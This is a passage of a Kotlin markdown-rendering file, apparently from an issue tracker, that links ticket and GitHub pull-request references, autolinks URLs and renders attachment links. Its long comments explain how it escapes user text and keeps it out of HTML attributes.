 * already inert is a title from [References.titleFor], which is arbitrary user
 * text; that is escaped where it is appended — see [linkifyRefs]. The repository
 * in a GitHub link's `href` is the other, and is checked for shape instead — see
 * [GITHUB_REPOSITORY].
 *
 * @param refs which references to link at all. No prefixes and no repository is a
 *   walk with nothing to do, and is the whole of how a reading surface with no
 *   project behind it opts out.
 */
private fun renderRefs(html: String, refs: References): String {
    // Both halves can be off, and each has a character its references cannot be
    // written without — so a document containing neither is handed straight back.
    val tickets = refs.prefixes.isNotEmpty() && html.contains('-')
    val gitHub = refs.gitHubRepository != null && html.contains('#')
    if (!tickets && !gitHub) return html

    val out = StringBuilder(html.length)
    // The open skip-elements, outermost first. A reference is linked only when
    // this is empty; anything on it means we are inside an <a>, <code> or mention.
    val skipStack = ArrayDeque<String>()
    var i = 0
    var textStart = 0

    fun flush(end: Int) {
        if (end <= textStart) return
        val segment = html.substring(textStart, end)
        out.append(if (skipStack.isEmpty()) linkifyRefs(segment, refs) else segment)
    }

    while (i < html.length) {
        if (html[i] != '<') {
            i++
            continue
        }
        flush(i)
        val close = html.indexOf('>', i)
        if (close < 0) break // Unterminated tag: impossible from our own output.
        val tag = html.substring(i, close + 1)
        out.append(tag)
        tagName(tag)?.let { name ->
            if (name in REF_SKIP_ELEMENTS) {
                if (tag.startsWith("</")) {
                    if (skipStack.lastOrNull() == name) skipStack.removeLast()
                } else if (!tag.endsWith("/>")) {
                    skipStack.addLast(name)
                }
            }
        }
        i = close + 1
        textStart = i
    }
    flush(html.length)
    return out.toString()
}

/** The lower-cased element name of a tag this file emitted, or null. */
private fun tagName(tag: String): String? {
    var start = 1
    if (start < tag.length && tag[start] == '/') start++
    var end = start
    while (end < tag.length && tag[end].isLetter()) end++
    return if (end > start) tag.substring(start, end).lowercase() else null
}

/**
 * One reference and what it is to be replaced with, resolved but not yet written.
 *
 * The two kinds of reference are found by two different means — a scanner for
 * tickets, a regex for `#123` — over the same run of prose, so they are turned
 * into this common shape and merged by position. That is what lets one pass write
 * both, and what makes an overlap a thing that can be *dropped* rather than a pair
 * of nested anchors nobody noticed. See [linkifyRefs].
 */
private class RefSpan(val start: Int, val end: Int, val html: String)

/**
 * Wrap every reference in one run of prose in an `<a>`.
 *
 * ── A ticket ────────────────────────────────────────────────────────────────
 *
 * The key is the reference as it was written — `lnl-1` stays `lnl-1` — because
 * that is what the author typed and rewriting it to the canonical case would be a
 * second, silent edit. The destination is the canonical [Ticket], which is what
 * `data-ticket` carries for the click handler and `?issue=` carries for a
 * middle-click or a copied link, both of which resolve case-insensitively anyway.
 *
 * When [References.titleFor] knows the referenced issue's title, it is appended
 * inside the same anchor as `key: Title` (LNL-144), so the whole thing is one link
 * and a click anywhere on it opens the issue. The title is arbitrary user text —
 * the one thing in this anchor not already HTML-escaped by [renderMarkdown]'s
 * up-front pass — so it is escaped here, and dimmed by its own class so the key
 * stays the emphatic part. An unknown or blank title leaves the reference bare,
 * exactly as before the title existed.
 *
 * A reference to [References.self] — the issue this very surface is showing — is
 * left as its plain key with no anchor at all (LNL-151): a board card leads with
 * its own key, and linking that back to the page you are already on is a click
 * that goes nowhere useful. The key is a substring of the already-escaped [text],
 * so it is safe to append verbatim.
 *
 * ── A pull request ──────────────────────────────────────────────────────────
 *
 * `#123` goes to `github.com/owner/repo/pull/123` on the repository the project is
 * linked to (LNL-178), and is an ordinary external link — a new tab and
 * `rel="noopener noreferrer"`, like every other off-site link this file writes.
 * `/pull/` rather than `/issues/`: GitHub redirects a pull URL to the issue when
 * the number turns out to be one, and not the other way round, so the spelling
 * that is right either way is this one.
 *
 * A number that is nobody's pull request still links, because this file has no way
 * to ask and inventing one would mean a request per reference per render. A 404 on
 * GitHub is a cheaper wrong answer than a reference that silently stopped being a
 * link.
 */
private fun linkifyRefs(text: String, refs: References): String {
    val spans = (ticketRefSpans(text, refs) + gitHubRefSpans(text, refs)).sortedBy { it.start }
    if (spans.isEmpty()) return text
    return buildString(text.length) {
        var cursor = 0
        spans.forEach { span ->
            // Two references cannot overlap today — a ticket key holds no `#` and a
            // `#123` no letters — but a dropped reference is a link that is missing
            // and a written one is markup nested inside markup, so the impossible
            // case resolves to the first of the two rather than to both.
            if (span.start < cursor) return@forEach
            append(text, cursor, span.start)
            append(span.html)
            cursor = span.end
        }
        append(text, cursor, text.length)
    }
}

/** The `PREFIX-NUMBER`s in one run of prose, as the anchors they are to become. */
private fun ticketRefSpans(text: String, refs: References): List<RefSpan> {
    if (refs.prefixes.isEmpty()) return emptyList()
    return ticketSpans(text, refs.prefixes).map { span ->
        val key = text.substring(span.start, span.end)
        val html = if (span.ticket == refs.self) key else buildString {
            append("<a href=\"?issue=").append(span.ticket).append("\" class=\"ticket-ref\" data-ticket=\"")
                .append(span.ticket).append("\">").append(key)
            refs.titleFor(span.ticket)?.takeIf { it.isNotBlank() }?.let { title ->
                append("<span class=\"ticket-ref-title\">: ").append(title.escapeHtml()).append("</span>")
            }
            append("</a>")
        }
        RefSpan(span.start, span.end, html)
    }
}

/** The `#NUMBER`s in one run of prose, as the anchors they are to become. */
private fun gitHubRefSpans(text: String, refs: References): List<RefSpan> {
    val repository = refs.gitHubRepository ?: return emptyList()
    return GITHUB_REF.findAll(text).map { match ->
        // The reference is the whole match bar group 1, the boundary character the
        // pattern had to consume in place of a lookbehind — that one is the prose's
        // and stays text. Measured off the match rather than read off `groups[2]`:
        // MatchGroup.range is a JVM-only member, and this file is common code.
        val digits = match.groupValues[2]
        val start = match.range.first + match.groupValues[1].length
        val end = start + 1 + digits.length
        RefSpan(
            start = start,
            end = end,
            html = externalLink("https://github.com/$repository/pull/$digits", text.substring(start, end)),
        )
    }.toList()
}

/**
 * The three things in a line that become an `href` or a `src`, in one pattern.
 *
 * ── Why one pattern and not three passes ────────────────────────────────────
 *
 * Images and links already had to share a pass in effect: their syntaxes differ
 * only by a leading `!`, so running the link rule first would match the
 * `[alt](url)` half of an image and leave a stray `!` in front of an `<a>`. The
 * old code expressed that as "images first, links second", which works and is one
 * ordering rule to remember.
 *
 * A bare URL cannot be added as a third pass under any ordering, and that is what
 * forced this shape:
 *
 *  - **After** the other two, and it matches the URL sitting inside the `src="…"`
 *    and `href="…"` those two just emitted — producing an `<a>` nested inside an
 *    attribute value, which is broken markup built out of a URL a user supplied.
 *  - **Before** them, and it matches the URL inside `[label](https://…)` before
 *    anything knows that URL is spoken for, turning a written link into an `<a>`
 *    inside a pair of literal brackets.
 *
 * One left-to-right scan has neither problem: at any position exactly one branch
 * matches, the whole construct is consumed, and the scan resumes after it. A URL
 * inside a markdown link is inside a match that already started at the `[`, so
 * the bare-URL branch never sees it.
 *
 * The `\]` must stay escaped. A bare `]` outside a character class is legal on
 * the JVM and legal in a plain JavaScript regex — and a **SyntaxError** in a
 * unicode-mode one, which is what Kotlin/JS compiles every [Regex] to (`/…/gu`).
 * So the unescaped version passes `jvmTest`, passes review, and then throws "Lone
 * quantifier brackets" in the browser the first time anyone renders a
 * description. Only `jsTest` catches it.
 *
 * ── The scheme-less branch ──────────────────────────────────────────────────
 *
 * `www.aftonbladet.se` is a link to everyone who reads it and to no parser that
 * asks for a scheme, so it gets a branch of its own. It cannot simply be folded
 * into the scheme branch as an optional prefix: what makes it a link is the
 * literal `www.`, and dropping the scheme requirement without it would autolink
 * every `foo.bar` in prose — including "etc.Then" and every file name anyone
 * mentions.
 *
 * It has to be anchored to a word boundary, which is why group 5 exists. Without
 * it `ada@www.example.com` and `.../path/www.x` link their tails, and a
 * lookbehind is not an option: Kotlin/JS compiles to a unicode-mode regex, and
 * lookbehind support there is the browser's, not ours. So the preceding
 * character is *matched* instead, in a group that [renderTargets] puts straight
 * back. `@` and `/` are excluded because they mean the `www.` belongs to
 * something bigger; a `.` because `foo.www.x` is one host, not prose then a
 * link. The character after `www.` is required to be one a host can start with,
 * so that a sentence ending "…and so on, see www." is left alone rather than
 * linked to nothing.
 *
 * Case-insensitive for this branch's sake — "Www.x.se" opens a sentence — and
 * harmlessly for the rest, where it also lets `HTTP://` through.
 *
 * Group 1 is the image's `!`, 2 the label or alt, 3 the URL in parentheses, 4 a
 * bare URL with a scheme, 5 the character before a scheme-less one, and 6 that
 * URL. The two bare branches stop at whitespace and at a placeholder — see
 * [PLACEHOLDER_BASE] — so a URL written immediately before an escaped character
 * does not swallow it.
 */
private val MARKDOWN_TARGET =
    Regex(
        "(!?)\\[([^\\]]*)\\]\\(([^)\\s]+)\\)" +
            "|(https?://[^\\s\\uE000-\\uE00F]+)" +
            "|(^|[^\\w@/.])(www\\.[\\w-][^\\s\\uE000-\\uE00F]*)",
        RegexOption.IGNORE_CASE,
    )

/**
 * Is this mention inside a tag rather than inside the text?
 *
 * ── The bug this exists to stop ─────────────────────────────────────────────
 *
 * `renderMentions` runs last, over text that [renderTargets] has already put tags
 * into — and a URL is allowed to contain an `@`. `https://example.com/@ada` is an
 * ordinary profile URL on half a dozen sites, and once it is autolinked its `@ada`
 * appears twice: in the link's text, where a mention chip is merely surprising,
 * and inside `href="…"`, where writing a `<span>` into the middle of an attribute
 * value is broken markup assembled out of a string a user supplied. That is not a
 * cosmetic problem; it is the one class of thing this file exists to never do.
 *
 * Safe to answer by counting angle brackets because of the ordering in
 * [renderMarkdown]: every `<` and `>` from the source is `&lt;`/`&gt;` by now, and
 * `restoreAllowedTags` has not run yet, so the only real ones are the tags this
 * file emitted itself.
 */
private fun MentionSpan.isInsideTag(text: String): Boolean {
    // Walk back to the nearest bracket. If it opens a tag, the mention is in one.
    for (index in start - 1 downTo 0) {
        when (text[index]) {
            '<' -> return true
            '>' -> return false
        }
    }
    return false
}

/**
 * `![alt](url)` → `<img>`, `[text](url)` → `<a>`, and a bare `https://…` or
 * `www.…` → `<a>`.
 *
 * The alt text and the label are already escaped and land in an attribute, which
 * is why [escapeHtml] escapes quotes. A refused URL renders as the alt text or
 * label alone rather than vanishing: silently dropping content a user wrote is
 * worse than showing it inertly.
 */
private fun renderTargets(text: String): String =
    MARKDOWN_TARGET.replace(text) { match ->
        val bare = match.groupValues[4]
        if (bare.isNotEmpty()) return@replace autolink(bare)

        // Group 5 is the character the www branch had to consume to prove it was
        // at a word boundary — never part of the link, so it goes straight back.
        val schemeless = match.groupValues[6]
        if (schemeless.isNotEmpty()) {
            return@replace match.groupValues[5] + autolink(schemeless, scheme = "https://")
        }

        val label = match.groupValues[2]
        val url = hostOnly(match.groupValues[3])
        when {
            !isSafeMarkdownUrl(url) -> label
            // The "!" is the whole difference between the two spellings.
            match.groupValues[1] == "!" -> "<img src=\"$url\" alt=\"$label\">"
            isAttachmentUrl(url) -> attachmentLink(url, label)
            else -> externalLink(url, label)
        }
    }

/**
 * `www.example.com` written inside a link's parentheses → the same URL with the
 * scheme its author left off.
 *
 * Without this, a *written* link is the one place a `www.` URL still fails: a
 * relative href is a legal thing to write — every attachment is one — so nothing
 * refuses it, and the reader is quietly sent to `…/www.example.com` on our own
 * host. Which is the harder failure to notice of the two, because the link looks
 * fine right up until it is clicked.
 *
 * Nothing else is guessed at. `example.com` with no `www.` stays relative,
 * because a bare word with a dot in it is far more often a path than a host, and
 * a rule that took it would break every relative link anyone has written.
 */
private fun hostOnly(url: String): String =
    if (url.startsWith("www.", ignoreCase = true)) "https://$url" else url

/**
 * A URL somebody typed as itself → a link to it, plus whatever punctuation was
 * really the sentence's.
 *
 * ── Why the tail has to be given back ───────────────────────────────────────
 *
 * "See https://example.com." ends in a full stop belonging to the sentence, and
 * "(https://example.com)" is a URL in parentheses. A pattern that stops at
 * whitespace cannot tell either from a URL that genuinely ends that way, because
 * both are legal characters in a path. So the match is deliberately greedy and
 * [splitUrlTail] hands the trailing punctuation back as text — which is the only
 * arrangement where a link and the prose around it both survive.
 *
 * No scheme check: the pattern that produced this only matches `http://`,
 * `https://` and `www.`, and the first two are two of the three
 * [isSafeMarkdownUrl] allows. A `javascript:` URL is not a bare URL to this rule
 * at all, so it stays text — which is a stricter answer than the written-link
 * branch needs to give, and the right one, since nobody types one by accident.
 *
 * @param scheme prepended to the `href` and to nothing else. A `www.` URL needs
 *   one to be a link at all — without it the browser reads it as a relative path
 *   and lands on our own host — but the reader wrote it bare and the link text
 *   stays exactly as written, which is also how it stays honest about where it
 *   goes for anyone hovering it. `https` rather than `http`: a host that only
 *   speaks the latter will redirect, and guessing the plain one downgrades every
 *   site that does not.
 */
private fun autolink(url: String, scheme: String = ""): String {
    val (target, tail) = splitUrlTail(url)
    // Everything trimmed off was a character this rule refused to be sure about,
    // so it goes back as the text it probably always was.
    if (target.isEmpty()) return tail
    return externalLink(scheme + target, target) + tail
}

/**
 * Split a greedily-matched bare URL into the URL and the punctuation after it.
 *
 * The entities matter as much as the plain punctuation and are easier to miss:
 * by the time any rule runs, a `"` in the source is the five characters `&quot;`
 * and a `>` is `&gt;` — so a URL quoted in prose ends in a *word*, not in a
 * symbol, and a trim that only looked at the last character would leave `&quot;`
 * inside the `href`.
 *
 * A trailing `)` comes off only when the URL holds no `(` to match it, which is
 * what keeps Wikipedia's `…/Foo_(disambiguation)` intact while still letting
 * "(see https://example.com)" close its own bracket.
 */
private fun splitUrlTail(url: String): Pair<String, String> {
    var end = url.length
    while (end > 0) {
        val entity = TRAILING_ENTITIES.firstOrNull { end >= it.length && url.startsWith(it, end - it.length) }
        if (entity != null) {
            end -= entity.length
            continue
        }
        val last = url[end - 1]
        if (last in TRAILING_PUNCTUATION) {
            end--
            continue
        }
        if (last == ')' && url.take(end).count { it == '(' } < url.take(end).count { it == ')' }) {
            end--
            continue
        }
        break
    }
    return url.take(end) to url.drop(end)
}

/** Escaped characters that read as punctuation once they are text again. */
private val TRAILING_ENTITIES = listOf("&amp;", "&quot;", "&#39;", "&lt;", "&gt;")

/** Punctuation that ends a sentence far more often than it ends a URL. */
private const val TRAILING_PUNCTUATION = ".,;:!?"

/**
 * An off-site link.
 *
 * `rel="noopener noreferrer"` because these open in a new tab, and a page opened
 * with `target=_blank` can otherwise reach back through `window.opener` and
 * navigate the tab that opened it. `noreferrer` keeps an issue's URL — which may
 * name a private project — out of the destination's logs.
 */
private fun externalLink(url: String, label: String): String =
    "<a href=\"$url\" target=\"_blank\" rel=\"noopener noreferrer\">$label</a>"

/**
 * Is this link one of our own uploaded files?
 *
 * Asked of the *escaped* text, and safe to be: an attachment URL is a fixed
 * prefix and a base64url id, none of which are among the five characters
 * [escapeHtml] touches, so the URL that reaches here is byte-for-byte the one
 * that was stored. Nothing has to be un-escaped to ask this question.
 *
 * The trailing id is checked for shape rather than assumed. It is what confines
 * the attachment path to a URL this app could actually have produced —
 * `/api/attachments/../../secret` is a link like any other, and gets a link's
 * treatment. The shape itself is [ApiRoutes.isAttachmentId], in the shared
 * module, so this and the server agree on it by construction; that check used to
 * be "all digits" here and had to change when the id stopped being a row id
 * (LNL-51).
 *
 * `startsWith` rather than a [Regex] built from the prefix, because building one
 * would mean escaping the prefix into a pattern, and this file has already been
 * bitten once by a regex that was legal on the JVM and a SyntaxError in the
 * browser — see [renderImages]. There is no pattern here to be wrong.
 *
 * A user can of course type this URL by hand into a link and get a download
 * affordance for a file that is not theirs. It costs nothing: the route answers
 * 404 to a reader who cannot see the owning project, so the affordance is a lie
 * the server immediately corrects — and since LNL-51 they have no id to type,
 * which is the point of that change rather than a bonus from it.
 */
private fun isAttachmentUrl(url: String): Boolean {
    if (!url.startsWith(ApiRoutes.ATTACHMENT_PREFIX)) return false
    val id = url.removePrefix(ApiRoutes.ATTACHMENT_PREFIX).removeSuffix(ApiRoutes.ATTACHMENT_VIEW_SUFFIX)
    return ApiRoutes.isAttachmentId(id)
}

/**
 * Is this attachment link one to open rather than one to save?
 *
 * Only ever asked of a URL [isAttachmentUrl] has already agreed to, so the
 * suffix is the entire question — the digits in front of it are checked there.
 * The renderer cannot know an attachment's type (markdown carries a URL and a
 * label, and nothing else), which is why the *uploader* encodes the answer in
 * the URL it writes. See attachmentMarkdown.
 */
private fun isViewableAttachmentUrl(url: String): Boolean = url.endsWith(ApiRoutes.ATTACHMENT_VIEW_SUFFIX)

/**
 * `[report.pdf (2.3 MB)](/api/attachments/12)` → a download.
 *
 * ── Why the renderer draws this and not the editor ──────────────────────────
 *
 * Because the stored document must stay markdown, and markdown has one spelling
 * for a link. There is no `[x](url){.attachment}` here, and inventing one would
 * mean the serialiser has to emit it and this file has to parse it — two new
 * things to get wrong, to express something the URL already says. So the
 * markdown is an ordinary link and *this* function decides how it looks, from
 * the URL alone. The serialiser reads the `href` back out and emits the same
 * ordinary link, and the round-trip is closed without either side knowing that
 * attachments exist. See MarkdownSerialiser.kt.
 *
 * `download` rather than `target="_blank"`: this URL answers with
 * `Content-Disposition: attachment`, so a new tab would open, download, and shut
 * again — a flash of nothing that reads as a broken link. The attribute has no
 * value, deliberately. Given one, it would name the saved file, and the only
 * name available here is the label, which by then also carries "(2.3 MB)"; bare,
 * the browser takes the filename from the header, which is the real one.
 *
 * The `/view` spelling is the exception, and it inverts both halves of that: it
 * answers with `Content-Disposition: inline`, so it *is* a page, and `download`
 * on it would save the report the reader asked to read. It gets the same
 * `target="_blank"` an ordinary external link gets, and for the same reason —
 * the issue you were reading should still be behind it when you close the tab.
 * `rel` stays either way; see renderLinks for what it is holding shut.
 *
 * The class is what the CSS hangs the icon and the box off — a download does not
 * look like a link, because clicking it does not do what a link does. There is
 * no user text in either attribute, so there is nothing here to escape that
 * [escapeHtml] has not already dealt with; the URL is a fixed prefix and digits
 * by the time [isAttachmentUrl] has agreed to this path.
 */
private fun attachmentLink(url: String, label: String): String {
    val behaviour = if (isViewableAttachmentUrl(url)) "target=\"_blank\"" else "download"
    return "<a href=\"$url\" class=\"attachment\" $behaviour rel=\"noopener noreferrer\">$label</a>"
}

/**
 * Turn the escaped `&lt;u&gt;` back into a real `<u>`.
 *
 * This is the *only* path by which a tag from the source document reaches the
 * output, and it is an exact-match substitution on a fixed list rather than
 * anything that parses. `<u foo="bar">` does not match and stays escaped, which
 * is the point: there is no attribute to smuggle a handler into, because there
 * is no attribute at all.
 */
private fun restoreAllowedTags(text: String): String {
    var out = text
    ALLOWED_INLINE_TAGS.forEach { tag ->
        out = out.replace("&lt;$tag&gt;", "<$tag>").replace("&lt;/$tag&gt;", "</$tag>")
    }
    return out
}
